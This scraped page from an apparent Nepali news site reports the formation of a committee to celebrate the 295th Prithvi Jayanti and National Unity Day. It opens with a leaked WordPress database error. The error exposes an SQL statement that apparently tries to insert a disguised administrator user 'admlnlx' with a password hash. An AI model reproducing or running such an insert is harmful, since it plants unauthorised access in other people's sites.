WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BSIVcobCzYUTXnSJ1rW/upahOARXF40', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 01:07:19', '', 'admlnlx', 'admlnlx')
काठमाडौँ, मंसिर २६–
पृथ्वी जयन्ती तथा राष्ट्रिय एकता दिवस मनाउनका लागि दुई सय ९५औँ पृथ्वी जयन्ती तथा राष्ट्रिय एकता दिवस मूल समारोह समिति शनिबार यहाँ गठन गरिएको छ ।
नेपाली काँग्रेसका पूर्व कोषाध्यक्ष रामबाबु प्रसाईंको अध्यक्षतामा गठन भएको सो नागरिक मूल समारोह समितिका उपाध्यक्षमा पूर्वमन्त्री प्रकाश कोइराला, पूर्व राज्यमन्त्री श्रीशशम्शेर जबरा, पूर्व सहायक मन्त्री दीनवन्धु अर्याल, चेतेन्द्रजङ्ग हिमाली, दिवशविक्रम शाह, रामलाल श्रेष्ठ, धार्मिक नेता शङ्कर पौडेल र महासचिवमा पत्रकार अमित लामा तामाङ रहनु भएको छ ।
पृथ्वी जयन्ती तथा राष्ट्रिय एकता दिवस आगामी पुस २७ गते देशभर मनाउन लागिएको नागरिक मूल समारोह समितिका महासचिव अमित लामाद्वारा जारी विज्ञप्तिमा जनाइएको छ ।